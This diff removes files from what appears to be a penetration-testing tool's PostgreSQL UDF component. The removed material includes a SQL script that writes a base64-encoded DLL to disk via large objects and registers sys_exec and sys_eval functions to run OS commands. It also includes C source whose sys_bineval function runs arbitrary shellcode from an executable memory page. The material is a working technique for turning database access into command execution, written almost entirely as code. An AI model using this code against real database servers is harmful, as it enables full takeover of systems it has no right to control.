-UPDATE udftest SET data=data||'AAAAAAAAAAAEAAAAAAABABgAAAAYAACAAAAAAAAAAAAEAAAAAAABAAIAAAAwAACAAAAAAAAAAAAEAAAAAAABAAkEAABIAAAAXIAAAFYCAADkBAAAAAAAAFhAAAA8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSI+PC9yZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbD4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgdHlwZT0id2luMzIiIG5hbWU9Ik1pY3Jvc29mdC5WQzkwLkNSVCIgdmVyc2lvbj0iOS4wLjIxMDIyLjgiIHByb2Nlc3NvckFyY2hpdGVjdHVyZT0ieDg2IiBwdWJsaWNLZXlUb2tlbj0iMWZjOGIzYjlhMWUxOGUzYiI+PC9hc3NlbWJseUlkZW50aXR5Pg0KICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogIDwvZGVwZW5kZW5jeT4NCjwvYXNzZW1ibHk+UEEAAAAAAAAAAAAAAAAsgwAABIMAAAAAAAAAAAAAAAAAADmDAAAcgwAAAAAAAAAAAAAAAAAARYMAACSDAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAFKDAABggwAAcIMAAICDAACOgwAAAAAAAJyDAAAAAAAAooMAAAAAAABLRVJORUwzMi5ETEwATVNWQ1I5MC5kbGwAcG9zdGdyZXMuZXhlAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABmcmVlAABwZnJlZQAAAAAAAAD5IYNJAAAAAAaEAAABAAAABQAAAAUAAADUgwAA6IMAAPyDAAAAEAAAgBAAABAQAACQEAAAIBAAACCEAAAuhAAAQIQAAFKEAABbhAAAAAABAAIAAwAEAGxpYl9wb3N0Z3Jlc3FsdWRmX3N5cy5kbGwAUGdfbWFnaWNfZnVuYwBwZ19maW5mb19zeXNfZXZhbABwZ19maW5mb19zeXNfZXhlYwBzeXNfZXZhbABzeXNfZXhlYwAAcAAAEAAAAC07KD0sPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-
-- DLL compiled using PostgreSQL 8.2 C libraries
-- INSERT INTO udftest(data) VALUES ('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD12MHTsbmvgLG5r4Cxua+AuME8gLO5r4C4wTqAsLmvgLjBLIC/ua+AuMErgLO5r4CWf9SAtLmvgLG5roCYua+AuMEmgLC5r4C4wT2AsLmvgLjBPoCwua+AUmljaLG5r4AAAAAAAAAAAFBFAABMAQMAUx6DSQAAAAAAAAAA4AACIQsBCQAAEAAAABAAAABgAAAgewAAAHAAAACAAAAAAAAQABAAAAACAAAFAAAAAAAAAAUAAAAAAAAAAJAAAAAQAAAAAAAAAgBAAQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAKyDAAC4AAAAtIIAAPgAAAAAgAAAtAIAAAAAAAAAAAAAAAAAAAAAAABkhAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7HwAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBYMAAAAAAAYAAAABAAAAAAAAAABAAAAAAAAAAAAAAAAAAAgAAA4FVQWDEAAAAAABAAAABwAAAADgAAAAQAAAAAAAAAAAAAAAAAAEAAAOAucnNyYwAAAAAQAAAAgAAAAAYAAAASAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
-- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4wMwBVUFghDQkCCXeP6gEDsfuvE1UAABwLAAAAIAAAJgAAXkB2Sf64AAAQ+MPMDxEM+9/+f1NVi2wkDItFEFZXUOgbAgKL2Iszgeb/AN1/938/g+4EjU4BUf8VQoxWjVMEi/hSVyMK/7GP/bBXxgQ3ABeEV4vwCJSDxBw7XRB0W/Zv3wlTRQgNBF+Lxl5dW2p/bfllLxDDEoHsCAShAu2zdf8gADPEiYQkBA2LBgxAEJ2F3d5kli2FgYs3nLIdefvVVoPHmNhXU2oBmTO3sdvu1WhlFFOaM/+ciCBTjdvYd+1UJDgWVlKJXCQ8FnylLLf///+FwHRbjUQkFI1QAesDjUkAighAhMl1+SvCMo0sfbeNtTt+KHhJUyQgUAP+V9iT7o8QgItMJCRRUiyL/VDY2fZyIHWvi2EQsFMXXzh8w5AOgD4AdAQ3FsZEN/+u/bK7AHCNZCRvg8AEULjggbnyucYsHKQAH/Ync+2JBxwZElCNRwRWUPjNF1w7i4ydiHYMi8dfM+7C4YfMNQ6BxF1u/yWF3/7hsagFpDsNbHUC88PpCAXLi/8QK2PuVmiAaOhw8f7/u7zHWVmjI1gEVIX2dQUzwEBew4MmAF3h6+5WB5loBMMJgnulBhuttbHVC1kjIk5Q7FfY/dtRUQo5RQx1DjkFaxB+bnMtNO7+EIN9DAGLCRBIiybYiWG3dd8KI0gPhdR9ZBcYBot5y7W72241ICiJ';
-- UPDATE udftest SET data=data||'PVC7HlDrGEoLD/bfpwSOO8d0F2joA6gsagDy/3fd9obWbOfrB8csATyhL0xqAm/37oZe0glqH5IJRus8qhDABHXte++4xwUfKBpA4CcH79/3nVyLILQEsBs6WYk1K/tztxs9WTmydQhpczA5PRXS3+69XHQcaAYoCHxDDf91PL7Y9rYDCCMW//FUiH+suRkB3AgBodt4BINl/ACZyM5m39sP1Pxjg7Ung/gCZtJZW//NsI19oFhLUDFZLjXmaN/hD4SHxxlUE0kU8e2luxgQiX2N7wQ7yHJRgz/b2j+2g/NqbDkHdOn/NyYg+BDabKExXLn4VhVxx+3NRBtHTfhVOU0Q27b2rQPQCHS0iQkCDBoIYGN20nbrp/YM/VlELttXiBE4WAZMMvwbjiALP1BDm1u/9Db8ycIMAGoQQxIo0Fv5i/KLXbK7vbkIHFTkM8lc/Il9IAhbi7Hw/DvxWjk6RBfk4c3/H6+EO/B0BYP+AnUuoew7wXSeFm64bVZf0Dte5AADkz24D2cR/mwUFoBWw7+TEglSJ/4BdSRkIFrEZoWzE1d3L1L+Gu010gYRU/dqA3VDYc92w080AyFodC4sLVx42CV/6xtx7IsXCXCpfLyq4FBRZEwQZei5Gg6t9i/60v67tcdv2xkFnSrkIb3DluyvcJrUFv87JGobd7cKjvZUfUhVDA0EklnKBWKGXTgiMygDbt5MG18hIEMFHIkVGIkd+25ubhSJNRCJPQxmjBg4BmZplmYNLB0IBe9uaZYEJQAtf/ycjxT5s421MJVWJAcEKI1FCLMx1v40i4Xg/KCqcJUBbR3btRwZICQTGAllwLm7ZowJHLNgiYXYMr4xzPIKBNwDFDRodMZfBaa0jFlq9xjWvs/geUYcgz0gAPkjrEDsHWhbG34G8cJ7eiTJw4BAHhTDahQLKSnySlAVqvj8/pMeopwQZFnrZ2oIN6RZQ3LDOI/tJzXDrdC6WTTg9b8D5FB/bSNgvkt0Zp4c3CpbjK0ULNbiCeDlJbRXG9I6';
-- UPDATE udftest SET data=data||'2wd53IRnk9xsmFnZTttt/u8WBt332BvA99hZSF1WuLwYvgQaHX/pV1A7xnMPiwdTAlA5rPQO1jv+cvEwJSALEinkIE9pDd6+ETUIuE1aLmY5AXP/8u9KWGhBPAPBgThQRXXvM9K5CwEbdoN/HEgYD5Tnwl07PyW+NS3dSDHID7dBRaVLbLdWBXEGM1cACBgR/98ajXbkoBwMO/lyCYtYCAPZO/sztd/gcgpCnCg71nLoat9ONh8O2U9q/qNwaNVkGOYbOBICUIPsCCnpu+HWMWYzxXDwZKMaiTAMFj5DTAloT/BwfV1nYuwS71WXLRNQt2iWhxkILAg7KyTBFYJw4egf9w/gAYkD1HbbqU8dAFmUi+WWKdaxnZ0Byj2pwPqdYmUt2C+7MUZGxk43PAVAREzG8uOSqRKwEOwJZbN2ch0Qyar776UWBh5a/T6UM5dttmwDjSvg+vzxQLAGmjyu/IrZwCbBdw3DlZYzHBzGUU4Ued6xfOh2aQISBCAUCqoYka3Y71yj7BBogvg7aA7+U1e/TuZAu35mfA2F6KdCicMrNZQE62C2xKRW43hjEXWYxhaKtZILl/AHNNHMlUEInSe++1vbOPQzDBE793UHvk9Z6wuF83XsEfgup8HgEAvwyAD31gfGRih9BF5fW7o/mAWcRkZGRlhcYGgAAGRHVAAA1CgV8gIhAI10Z9l9pRQRIgNkA0Bl0AzSAXJIXf///RJREhBLUlNEUwG3/T9I581Otf//N//blFHkL74MDGM6XERvY3VtZW50cyBhbmQgU2X//9v/dHRpbmdzXEFkbQdpc3RyYXRvci5XMkszU1RFTv63t/ZVUERBBjNlc2sWcFxzaGFyZVx2/O3/3yZ1YWxfY3BwX3Byb2plY3Q+bGliX3Bv/f//tmcfc3FsdWRmX3N5c184MlxSZWxlYXNlIMd+gSAucGRi0dUZbPK9WHcH0A91g3WVq6EHbQOBAzslhyfMB30PJNGdsNgfCQsDH9AogwAAAn0DpaLtsRm/RP+q';
-- UPDATE udftest SET data=data||'iiSCAIAAAGAw/woqwEIU//+XZ3gQAUdldEN1cnJlbnRQcm9jZXNzvf//yElkU3lzdGVtVGltZUFzRmlsZQn+1n6LGAhja0NvdS8NUXVlcnlQrcXa3wNmb3JtYW48Fg4Y3/6t+0Rpc2FiM2hXYWRMaWJyYSdDYWxsXCv/t3NvSXNEZWJ1Z2dlcm127W172VRTVW5oQGQxZEV4Rq2wmPtwdGlvbnNKGQTQtpS5ElQXtm+ytkRhHhFJkGwMa8257dZAnW1wh2VHUX9Zwlpzd1VRIhtCYbZsXMQVM6y7Pc2FPF9jaXQ0bQrXtu8GXzRfYW1zZwh4EQvtd7/wZGp1Ql9mZGl2DV9DcHBYY78JoP1hvF9kZWNvA5HctjBhaTJdbR55GGxr7xVCizL1CW5NESYLFhMPZQ2+dvuEXxtyNF9MbW0cGG5bs2v/V2RfbnU9RG1hYx5ye25hYzRuc9gdCMZuhm1m8nQsrnJuhHPN3O0d/N0qcGVVRV5zhfYPYwe0MDrvsdsE51bIzotvb7aGoX1rIlZuX3R5ORwaFlsotIkVil9yCp49zcJsRpGkcEVwZwFccO9DdG9hc0u6dW3///9nVhAzGAksFiMtCxcpERcRB4YGBhcJBwUWDB5/+///CAoLFgkYGBUFBhsFDBAGBxcGIQURDwYUIRELCCff/7crIgUHDREdDRhTLUg4BgAHCLJt3y4MCTMKCQsMWwUWFu7f/u0OCzQVCxgWDT0FQrwFEh4UBmky2d7N/xEMDh1NBRcjDQwkCAtEAvBvKvh/NARgBOgIBBwcBAAyTAEFAC3/YfVTHoNJNOAAAiELAQkMCJj9JlsArBULbOa+9xoJCwLeHgf3uzTfA2AEc4IeQAEqbM+WvQIHBnAmB7hmtm/ZjCJQFEBPsACrZntTUJ930BzVtyx2IBghQgAvbPMDSbAudGV4dLoKkMNDNhsMt0JgLnLLLWGQW2H7KAcIE7rvNYcCQC4m/gOUMLhN2WkCJ8BPc3Jg3wvWgOuwcxpPzc3RCFKp';
-- UPDATE udftest SET data=data||'T4wBUPtNySAeQhuMIxIAAHxyoVJTAAASAAAA/wAAAACAfCQIAQ+FuQEAAGC+AHAAEI2+AKD//1eDzf/rDZCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97ktAAAAigdHLOg8AXf3gD8AdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgBQAACLBwnAdDyLXwSNhDC0cgAAAfNQg8cI/5YEcwAAlYoHRwjAdNyJ+VdI8q5V/5YIcwAACcB0B4kDg8ME6+FhMcDCDACDxwSNXvwxwIoHRwnAdCI873cRAcOLA4bEwcAQhsQB8IkD6+IkD8HgEGaLB4PHAuvii64McwAAjb4A8P//uwAQAABQVGoEU1f/1Y2HBwIAAIAgf4BgKH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOnDmP//AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEBAiABABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-- UPDATE udftest SET data=data||'AAAAAAAAAAAEAAAAAAABABgAAAAYAACAAAAAAAAAAAAEAAAAAAABAAIAAAAwAACAAAAAAAAAAAAEAAAAAAABAAkEAABIAAAAXIAAAFYCAADkBAAAAAAAAFhAAAA8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSI+PC9yZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbD4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgdHlwZT0id2luMzIiIG5hbWU9Ik1pY3Jvc29mdC5WQzkwLkNSVCIgdmVyc2lvbj0iOS4wLjIxMDIyLjgiIHByb2Nlc3NvckFyY2hpdGVjdHVyZT0ieDg2IiBwdWJsaWNLZXlUb2tlbj0iMWZjOGIzYjlhMWUxOGUzYiI+PC9hc3NlbWJseUlkZW50aXR5Pg0KICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogIDwvZGVwZW5kZW5jeT4NCjwvYXNzZW1ibHk+UEEAAAAAAAAAAAAAAAAsgwAABIMAAAAAAAAAAAAAAAAAADmDAAAcgwAAAAAAAAAAAAAAAAAARYMAACSDAAAAAAAAAAAAAAAAAAAAAAAA';
-- UPDATE udftest SET data=data||'AAAAAFKDAABggwAAcIMAAICDAACOgwAAAAAAAJyDAAAAAAAAooMAAAAAAABLRVJORUwzMi5ETEwATVNWQ1I5MC5kbGwAcG9zdGdyZXMuZXhlAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABmcmVlAABwZnJlZQAAAAAAAABTHoNJAAAAAAaEAAABAAAABQAAAAUAAADUgwAA6IMAAPyDAAAAEAAAkBAAABAQAACgEAAAIBAAACCEAAAuhAAAQIQAAFKEAABbhAAAAAABAAIAAwAEAGxpYl9wb3N0Z3Jlc3FsdWRmX3N5cy5kbGwAUGdfbWFnaWNfZnVuYwBwZ19maW5mb19zeXNfZXZhbABwZ19maW5mb19zeXNfZXhlYwBzeXNfZXZhbABzeXNfZXhlYwAAcAAAEAAAAC07KD0sPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-
-
-- Create a new OID for a large object, it implicitly adds an entry in the
-- PostgreSQL large objects system table
-- 
-- References:
-- http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
-- http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
-SELECT lo_unlink(35817);
-SELECT lo_create(35817);
-
-
-- Update the PostgreSQL system large objects table assigning to the just
-- created OID the binary (base64 decoded) UDF as data
-- 
-- Refereces:
-- http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM udftest), 'base64')) WHERE loid=35817;
-
-
-- Export the binary UDF OID to a file on the file system
-- 
-- Any folder where postgres user has read/write/execute access is valid
-- SELECT lo_export(35817, E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll');
-- 
-- Notes:
-- If the library file already exists, the user postgres does not have
-- access to overwrite it
-- The following enumerates the PostgreSQL data directory
-- SELECT CURRENT_SETTING('data_directory')
-- Reference:
-- http://www.postgresql.org/docs/8.3/interactive/functions-admin.html
-- The following will save into C:\Program Files\PostgreSQL\8.3\data
-SELECT lo_export(35817, 'lib_postgresqludf_sys.dll'); -- Favourite one, no need to enumerate the PostgreSQL data directory before
-- The following will save into nowhere
-- SELECT lo_export(35817, E'\lib_postgresqludf_sys.dll');
-- The following would save into C:\ (Permission denied)
-- SELECT lo_export(35817, E'\\lib_postgresqludf_sys.dll');
-
-
-- Create two functions from the binary UDF file
-- CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-- CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-
-
-- Test the two functions
-SELECT sys_exec('echo test > %TEMP%/lib_postgresqludf_sys.txt'); -- %TEMP% path is C:\Documents and Settings\postgres\Local Settings\Temp
-SELECT sys_eval('echo %TEMP% && whoami');
-
-
-- Cleanup the file system and the database
-SELECT sys_exec('del %TEMP%\\lib_postgresqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-DROP FUNCTION IF EXISTS sys_exec(text);
-DROP FUNCTION IF EXISTS sys_eval(text);
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/linux/Makefile
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/linux/Makefile
@@ -1,11 +0,0 @@
-LIBDIR=/tmp
-
-8.2:
-	gcc -Wall -I/usr/include/postgresql/8.2/server -O1 -shared src/8.2/lib_postgresqludf_sys.c -o so/8.2/lib_postgresqludf_sys.so
-	strip -sx so/8.2/lib_postgresqludf_sys.so
-	cp -f so/8.2/lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.3:
-	gcc -Wall -I/usr/include/postgresql/8.3/server -O1 -shared src/8.3/lib_postgresqludf_sys.c -o so/8.3/lib_postgresqludf_sys.so
-	strip -sx so/8.3/lib_postgresqludf_sys.so
-	cp -f so/8.3/lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/linux/so/8.2/lib_postgresqludf_sys.so
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/linux/so/8.2/lib_postgresqludf_sys.so
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/linux/so/8.3/lib_postgresqludf_sys.so
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/linux/so/8.3/lib_postgresqludf_sys.so
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/linux/src/8.2/lib_postgresqludf_sys.c
+++ b/extra/postgresqludfsys/lib_postgresqludf_sys/linux/src/8.2/lib_postgresqludf_sys.c
@@ -1,192 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	//SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif
--- a/extra/postgresqludfsys/lib_postgresqludf_sys/windows/dll/8.2/lib_postgresqludf_sys.dll
